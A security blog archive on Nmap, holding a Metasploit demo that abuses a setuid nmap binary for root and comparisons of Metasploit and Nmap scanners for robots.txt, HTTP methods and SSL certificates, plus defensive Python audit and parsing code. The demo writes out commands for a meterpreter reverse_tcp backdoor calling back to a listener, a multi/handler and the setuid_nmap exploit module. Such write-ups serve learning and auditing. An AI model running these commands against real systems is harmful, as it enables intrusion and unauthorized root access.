Category Archives: Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), and a utility for comparing scan results (Ndiff).

Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You need an active session on the target; in this demo the session is obtained through a backdoor.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor to the target.

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid
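As a defender's counterpart to the module above, here is an added example (not code from the post, from Metasploit or from the Nmap project) that audits whether an nmap binary carries the setuid or setgid bit the man page warns against. The list of search directories is an assumption, and the sample file created in a temporary directory is constructed for the demo.

```python
import os
import stat
import tempfile

# Locations where an administrator might have installed a privileged nmap.
# Assumed list for illustration; extend it for your own hosts.
DEFAULT_SEARCH_DIRS = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/usr/local/sbin")


def setuid_report(path):
    """Describe the privilege bits of one executable.

    Returns None if the path does not exist, otherwise a dict with the
    setuid/setgid flags, the owner uid and a 'privileged' verdict: True when
    the program would run with an EUID (setuid) or an extra group (setgid)
    that the caller does not have, which is what Nmap's man page warns
    against. Symlinks are followed so the report describes the real binary.
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    is_suid = bool(st.st_mode & stat.S_ISUID)
    is_sgid = bool(st.st_mode & stat.S_ISGID)
    return {
        "path": path,
        "setuid": is_suid,
        "setgid": is_sgid,
        "owner_uid": st.st_uid,
        "root_setuid": is_suid and st.st_uid == 0,  # worst case: suid root
        "privileged": is_suid or is_sgid,
    }


def find_privileged(name="nmap", search_dirs=DEFAULT_SEARCH_DIRS):
    """Return a report for every copy of `name` in search_dirs that is setuid or setgid."""
    hits = []
    for directory in search_dirs:
        report = setuid_report(os.path.join(directory, name))
        if report and report["privileged"]:
            hits.append(report)
    return hits


def make_sample_binary(directory, mode):
    """Create an empty file named 'nmap' with the given mode (constructed demo input).

    Setting the setuid bit on a file you own needs no special rights, so this
    works as an ordinary user; the file is never executed.
    """
    path = os.path.join(directory, "nmap")
    with open(path, "w"):
        pass
    os.chmod(path, mode)
    return path


def demo_in_tempdir(mode):
    """Run the audit against a constructed 'nmap' file with `mode`; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_binary(tmp, mode)
        return find_privileged(search_dirs=(tmp,))


if __name__ == "__main__":
    # Real audit of the usual install locations on this machine.
    for finding in find_privileged():
        print("WARNING: privileged nmap found:", finding)
    # Demo against a constructed setuid file, which should always be reported.
    for finding in demo_in_tempdir(0o4755):
        print("demo finding:", finding)
```

Run it as a normal user: the demo finding is always printed, and anything printed as a WARNING is an nmap installed the way the man page says it should not be.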

Robots.txt scanning differences between Metasploit and Nmap

Metasploit has an auxiliary scanner dedicated to robots.txt files. I was interested in comparing this Metasploit auxiliary scanner with the Nmap robots.txt NSE script.

I decided to scan a /19 range, which represents 8192 IP addresses, with the two tools, and to compare the results and the time taken by each scan.

Metasploit

By default, the Metasploit “scanner/http/robots_txt” auxiliary scanner is configured with 50 threads; you can increase the number of threads by setting the THREADS option. We set THREADS to 256.

Metasploit, from the console, took around 40 seconds to scan all 8192 IP addresses and returned 41 responses.

Example of output :

[*] [xxx.xxx.xxx.xxx] /robots.txt found
[*] [xxx.xxx.xxx.xxx] /robots.txt – /database/, /includes/, /misc/, /modules/, /sites/, /themes/, /scripts/, /updates/, /profiles/, /xmlrpc.php, /cron.php, /update.php, /install.php, /INSTALL.txt, /INSTALL.mysql.txt, /INSTALL.pgsql.txt, /CHANGELOG.txt, /MAINTAINERS.txt, /LICENSE.txt, /UPGRADE.txt, /admin/, /comment/reply/, /contact/, /logout/, /node/add/, /search/, /user/register/, /user/password/, /user/login/, /?q=admin/, /?q=comment/reply/, /?q=contact/, /?q=logout/, /?q=node/add/, /?q=search/, /?q=user/password/, /?q=user/register/, /?q=user/login/

Nmap

With Nmap, the following command scans for robots.txt files.

time sudo nmap --script=robots.txt -p80 -PN -T4 -oN xxx.xxx.xxx.xxx_19.txt xxx.xxx.xxx.0/19

Nmap took around 11 minutes to scan all 8192 IP addresses and returned 38 responses.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.040s latency).
PORT   STATE SERVICE
80/tcp open  http
| robots.txt: has 38 disallowed entries (15 shown)
| /database/ /includes/ /misc/ /modules/ /sites/ /themes/
| /scripts/ /updates/ /profiles/ /xmlrpc.php /cron.php /update.php
|_/install.php /INSTALL.txt /INSTALL.mysql.txt

Depending on the verbosity level you give Nmap, the complete list of disallowed entries is displayed.

At first sight, Metasploit appears faster than Nmap at retrieving all the robots.txt files. Metasploit discovered 41 robots.txt files and Nmap 38. If you look at the following matrix, you will see that a total of 44 robots.txt files were discovered, so 3 were missed by Metasploit and 6 by Nmap. In most cases the files missed are not the same for the two tools.

In the matrix, a missed robots.txt file is marked 0 and a found one 1. The “robots.txt” column represents the tests made with a basic web browser: 1 for existing files, 0 for non-existing or not accessible files.

Case A is always missed by Nmap only. The following robots.txt content is missed:

User-agent: *
Disallow:

A robots.txt file exists, but because the Disallow directive contains no entries, the NSE script does not match it.

Case C is also missed by Nmap only:

User-agent: *
Disallow: /

This case looks like case B, but Metasploit finds it.

Finally, case X is detected by Nmap but not by Metasploit, and is also not accessible with a traditional web browser or the wget command line: Apache returns a 404 error code, yet Nmap returns some robots.txt entries.
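To make the cases concrete, here is an added example (not code from the post, from the NSE script or from the Metasploit module) that parses a robots.txt body and classifies it along the lines on which the two tools differ. The “presence” and “entries-only” detection criteria are reconstructed from the post's observations, not taken from either tool's source; the status/body pairs are constructed samples, and in practice you would feed in the result of your own HTTP fetch.

```python
def parse_robots(body):
    """Parse robots.txt text into [(user_agents, [(field, value), ...]), ...].

    Comments ('#') are stripped, field names are case-insensitive and a new
    record starts when a User-agent line follows a block of rules, which is
    how the robots exclusion format groups its directives.
    """
    records, agents, rules = [], [], []
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if rules:
                records.append((agents, rules))
                agents, rules = [], []
            agents.append(value)
        elif field in ("disallow", "allow"):
            rules.append((field, value))  # value may be "" (nothing disallowed)
    if agents or rules:
        records.append((agents, rules))
    return records


def disallowed_paths(body):
    """All non-empty Disallow values across every record."""
    return [v for _, rules in parse_robots(body) for f, v in rules if f == "disallow" and v]


def classify(status, body):
    """One of 'absent', 'present-empty', 'present-block-all', 'present-entries'."""
    if status != 200:
        return "absent"             # case X in the post: Apache answers 404
    paths = disallowed_paths(body)
    if not paths:
        return "present-empty"      # case A: 'Disallow:' with no value
    if all(p == "/" for p in paths):
        return "present-block-all"  # case C: 'Disallow: /'
    return "present-entries"


def detected_by_presence(status, body):
    """File-presence criterion: what the post's browser column measures (any HTTP 200)."""
    return status == 200


def detected_by_entries(status, body):
    """Entries-only criterion: reproduces the misses the post reports on cases A and C.

    This is a reconstruction of the observed behaviour, not the NSE script's logic.
    """
    return classify(status, body) == "present-entries"


# Constructed samples, one per case discussed in the post.
SAMPLES = {
    "A": (200, "User-agent: *\nDisallow:\n"),
    "C": (200, "User-agent: *\nDisallow: /\n"),
    "X": (404, "<html><head><title>404 Not Found</title></head></html>"),
    "drupal": (200, "User-agent: *\nDisallow: /database/\nDisallow: /includes/\nDisallow: /install.php\n"),
}


def compare(samples=SAMPLES):
    """Map each sample name to (classification, presence_hit, entries_hit)."""
    return {
        name: (classify(s, b), detected_by_presence(s, b), detected_by_entries(s, b))
        for name, (s, b) in samples.items()
    }


if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```

The two criteria disagree exactly on cases A and C (the file exists but carries no path entries), which is why a scanner that keys on entries under-reports, while a scanner that keys on the HTTP 200 alone cannot explain case X, where no file is served at all.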

HTTP Methods scanning differences between Metasploit and Nmap

Metasploit has auxiliary modules dedicated to scanning HTTP methods. I was interested in comparing this Metasploit module with the Nmap http-methods NSE script.

I decided to scan a /24 range, which represents 255 IP addresses, with the two tools, and to compare the results and the time taken by each scan.

Metasploit

By default, the Metasploit “scanner/http/options” auxiliary module is configured with 50 threads; you can increase the number of threads by setting the THREADS option. We set THREADS to 256.

Cli testing

time sudo msfcli scanner/http/options THREADS=256 RHOSTS=xxx.xxx.xxx.xxx/24 E

Metasploit, from the cli, took around 21 seconds to scan all 255 IP addresses and returned 7 responses.

Console testing

Metasploit, from the console, took around 13 seconds to scan all 255 IP addresses and returned 7 responses, the same as the cli.

Example of output :

[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD methods
[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD, POST methods

Nmap

With Nmap, the following command scans the HTTP methods.

time sudo nmap --script=http-methods -PN -T4 -p 80 -oN xxx.xxx.xxx.0-255_http_methods.txt xxx.xxx.xxx.0/24

Nmap took around 11 seconds to scan all 255 IP addresses and returned 7 responses. The 7 responses are the same as Metasploit's, with the same available methods detected.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
| Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
|_See http://nmap.org/nsedoc/scripts/http-methods.html

In terms of execution time, the Metasploit console and Nmap are equivalent, but in terms of results, the Nmap NSE script's flagging of potentially risky methods, with a reference link, is useful extra information included by default.
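Comparing the two outputs by eye is error-prone because Metasploit echoes the server's Allow header verbatim (so the separator varies between “,” and “, ”) while Nmap prints a space-separated list. The added example below (my code, not from the post, from Metasploit or from the NSE script) parses both formats into method sets, checks that the tools agree per host, and flags the methods outside GET/HEAD/POST/OPTIONS; that “uninteresting” set is reconstructed from the sample output on this page rather than copied from the script, and the hosts and output lines are constructed samples.

```python
import re

# Methods the Nmap output on this page does not flag; everything else it reports
# as "potentially risky". Reconstructed from the sample output, not from the
# NSE script's source.
UNINTERESTING_METHODS = frozenset({"GET", "HEAD", "POST", "OPTIONS"})

MSF_LINE = re.compile(r"^\[\*\]\s+(\S+)\s+allows\s+(.+?)\s+methods$")


def parse_msf_line(line):
    """'[*] 192.0.2.10 allows GET,HEAD,POST methods' -> ('192.0.2.10', frozenset({...})).

    The Allow header is echoed verbatim, so both 'A,B' and 'A, B' must be accepted.
    Returns None for lines that are not method results.
    """
    m = MSF_LINE.match(line.strip())
    if not m:
        return None
    host, allow = m.groups()
    return host, frozenset(tok.strip().upper() for tok in allow.split(",") if tok.strip())


def parse_nmap_output(text):
    """Parse Nmap normal output (-oN) into {host: methods} for each http-methods line.

    Handles the single-line '| http-methods: ...' format shown on this page.
    """
    results, host = {}, None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")  # the IP is the last token, maybe in parentheses
            continue
        m = re.match(r"^\|\s*http-methods:\s*(.+)$", line)
        if m and host:
            results[host] = frozenset(m.group(1).split())
    return results


def risky_methods(methods):
    """Methods a reviewer should look at: anything outside the uninteresting set."""
    return frozenset(methods) - UNINTERESTING_METHODS


def compare_tools(msf_lines, nmap_text):
    """Per host: whether both tools saw it, whether they agree, and the risky methods."""
    msf = dict(filter(None, (parse_msf_line(line) for line in msf_lines)))
    nmap = parse_nmap_output(nmap_text)
    report = {}
    for host in sorted(set(msf) | set(nmap)):
        a, b = msf.get(host), nmap.get(host)
        report[host] = {
            "in_both": a is not None and b is not None,
            "agree": a == b,
            "risky": sorted(risky_methods((a or frozenset()) | (b or frozenset()))),
        }
    return report


# Constructed samples using documentation addresses (RFC 5737).
MSF_SAMPLE = [
    "[*] 192.0.2.10 allows OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK methods",
    "[*] 192.0.2.11 allows OPTIONS, TRACE, GET, HEAD methods",
]
NMAP_SAMPLE = """Nmap scan report for www.example.com (192.0.2.10)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
| Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
|_See http://nmap.org/nsedoc/scripts/http-methods.html
Nmap scan report for 192.0.2.11
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-methods: OPTIONS TRACE GET HEAD
"""

if __name__ == "__main__":
    for host, row in compare_tools(MSF_SAMPLE, NMAP_SAMPLE).items():
        print(host, row)
```

On the samples both tools agree for each host; the second host shows that TRACE alone is enough to be flagged, which matches the post's point that the NSE script surfaces risk by default while the Metasploit module only lists what the server allows.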

HTTPS cert scanning differences between Metasploit and Nmap

Metasploit has auxiliary modules dedicated to HTTPS cert and SSL scanning. I was interested in comparing this Metasploit module with the Nmap ssl-cert NSE script.

I decided to scan a /24 range, which represents 255 IP addresses, with the two tools, and to compare the results and the time taken by each scan.

Metasploit

By default, the Metasploit “scanner/http/cert” auxiliary module is configured with 50 threads; you can increase the number of threads by setting the THREADS option. We set THREADS to 256. We also decreased the ConnectTimeout advanced option to 1 second, and set the SHOWALL option to true in order to get issuers and validity times.

Metasploit suggests using this auxiliary module from the console rather than from the cli.

Cli testing

time sudo msfcli scanner/http/cert ConnectTimeout=1 SHOWALL=true THREADS=256 RHOSTS=xxx.xxx.xxx.xxx/24 E

Metasploit, from the cli, took around 14 seconds to scan all 255 IP addresses and returned 9 responses.

Console testing

Metasploit, from the console, took around 5 seconds to scan all 255 IP addresses and returned 9 responses.

Example of output :

[+] xxx.xxx.xxx.xxx – ‘toto.sploit.com’ : /C=US/ST=UT/L=Salt Lake City/O=The USERTRUST Network/OU=http://www.usertrust.com/CN=UTN-USERFirst-Hardware
[-] xxx.xxx.xxx.xxx – ‘toto.sploit.com’ : ‘Sat Jan 01 00:00:00 UTC 2000’ – ‘Sat Jan 01 00:00:00 UTC 2000′ (EXPIRED)’

With both the console and the cli, we see strange behaviour in the certificate times, which should normally tell whether the certificate is expired or not: all 9 certificates are reported as expired, with this kind of output: ‘Sat Jan 01 00:00:00 UTC 2000′ – ‘Sat Jan 01 00:00:00 UTC 2000’ (EXPIRED)‘.

By switching the SSLVersion advanced option from SSL3 to SSL2, I discovered one more certificate. So the Metasploit cert scanner discovered a total of 10 certificates out of 11.

Nmap

With Nmap, the following command scans the HTTPS certificates. The amount of information printed about the certificate depends on the verbosity level. With no extra verbosity, the script prints the validity period and the commonName, organizationName, stateOrProvinceName, and countryName of the subject.

time sudo nmap --script=ssl-cert -PN -T4 -p 443 -oN xxx.xxx.xxx.xxx-255_ssl_cert.txt xxx.xxx.xxx.xxx/24

Nmap took around 11 seconds to scan all 255 IP addresses and returned 11 responses.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.14s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-cert: Subject: commonName=toto.sploit.com/organizationName=Sploit Inc./stateOrProvinceName=Luna/countryName=EU
| Issuer: commonName=UTN-USERFirst-Hardware/organizationName=The USERTRUST Network/stateOrProvinceName=UT/countryName=US
| Not valid before: 2007-10-22 00:00:00
| Not valid after:  2010-10-21 23:59:59
| MD5:   661a 63d2 1554 e5cc 250c 8991 ae34 56ce
|_SHA-1: e3e9 1fc1 6843 3b9b d686 e9ea fec2 6c2b ac01 afa3

There is surely a bug in the Metasploit auxiliary module's certificate expiration check.

A single Nmap NSE script gives you more information on the certificate (MD5, cipher and details of the cert). To get the same information with Metasploit you need to run another auxiliary module, “scanner/http/ssl”. This other module also scans the 255 IP addresses in around 5 seconds, but still returns 10 responses: one certificate, an SSL3 one, is still missing.

With the Nmap NSE script you don't have to switch between SSL versions to discover all the SSL certs.

Update: the Metasploit cert auxiliary scanner module's time handling has been corrected and the certificate validity times are now correct, but it still discovers 10 certificates out of 11.
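The expiration bug above is a good illustration of why a validity check should distinguish “dates not read” from “expired”. The added example below (my code, not from the post, from Nmap or from Metasploit) parses the ssl-cert output shown on this page into a validity window, evaluates it at a chosen date, and treats a degenerate window (end not after start, as in the placeholder ‘Sat Jan 01 00:00:00 UTC 2000’ pair) as unparsed rather than expired. The host name and address in the sample are constructed; the fingerprint and dates are taken from the output above. It checks validity dates only, not the chain or the host name.

```python
from datetime import datetime, timezone

NMAP_DATE = "%Y-%m-%d %H:%M:%S"          # 'Not valid before: 2007-10-22 00:00:00'
MSF_DATE = "%a %b %d %H:%M:%S UTC %Y"    # 'Sat Jan 01 00:00:00 UTC 2000'


def parse_time(text, fmt):
    """Parse a timestamp in the given strptime format and tag it as UTC."""
    return datetime.strptime(text.strip(), fmt).replace(tzinfo=timezone.utc)


def parse_nmap_ssl_cert(text):
    """Parse Nmap normal output from --script=ssl-cert into {host: cert_dict}.

    Only the default-verbosity fields shown on this page are extracted.
    """
    certs, host = {}, None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")  # IP is the last token, maybe in parentheses
            continue
        if host is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()     # drop the '| ' / '|_' script-output prefix
        cert = certs.setdefault(host, {})
        if body.startswith("ssl-cert: Subject:"):
            cert["subject"] = body[len("ssl-cert: Subject:"):].strip()
        elif body.startswith("Issuer:"):
            cert["issuer"] = body[len("Issuer:"):].strip()
        elif body.startswith("Not valid before:"):
            cert["not_before"] = parse_time(body.split(":", 1)[1], NMAP_DATE)
        elif body.startswith("Not valid after:"):
            cert["not_after"] = parse_time(body.split(":", 1)[1], NMAP_DATE)
        elif body.startswith("SHA-1:"):
            cert["sha1"] = body.split(":", 1)[1].replace(" ", "").strip()
    return certs


def validity_status(not_before, not_after, now):
    """Classify a validity window at time `now`.

    Returns 'unparsed' for a degenerate window (end not after start). That is
    what the buggy Metasploit output on this page looked like, both ends being
    the same placeholder date, and such a window must not be reported as
    EXPIRED because the dates were never really read from the certificate.
    """
    if not_after <= not_before:
        return "unparsed"
    if now < not_before:
        return "not-yet-valid"
    if now > not_after:
        return "expired"
    return "valid"


def status_for_host(nmap_text, host, now):
    """Validity status of the certificate Nmap reported for `host`."""
    cert = parse_nmap_ssl_cert(nmap_text)[host]
    return validity_status(cert["not_before"], cert["not_after"], now)


# Constructed sample: host name and address are placeholders, the fingerprint
# and dates are the ones shown in the Nmap output on this page.
NMAP_SAMPLE = """Nmap scan report for www.example.com (192.0.2.10)
Host is up (0.14s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-cert: Subject: commonName=www.example.com/organizationName=Example Inc./stateOrProvinceName=Luna/countryName=EU
| Issuer: commonName=UTN-USERFirst-Hardware/organizationName=The USERTRUST Network/stateOrProvinceName=UT/countryName=US
| Not valid before: 2007-10-22 00:00:00
| Not valid after:  2010-10-21 23:59:59
| MD5:   661a 63d2 1554 e5cc 250c 8991 ae34 56ce
|_SHA-1: e3e9 1fc1 6843 3b9b d686 e9ea fec2 6c2b ac01 afa3
"""

# The placeholder value the post reports from the Metasploit module.
MSF_PLACEHOLDER = "Sat Jan 01 00:00:00 UTC 2000"

if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    for host, cert in parse_nmap_ssl_cert(NMAP_SAMPLE).items():
        print(host, cert["subject"], validity_status(cert["not_before"], cert["not_after"], now))
    p = parse_time(MSF_PLACEHOLDER, MSF_DATE)
    print("placeholder window:", validity_status(p, p, now))
```

Evaluated at the scan date of the post the sample certificate is reported as expired on its real dates, while the placeholder pair comes back as unparsed, which is the answer the Metasploit module should have given instead of EXPIRED.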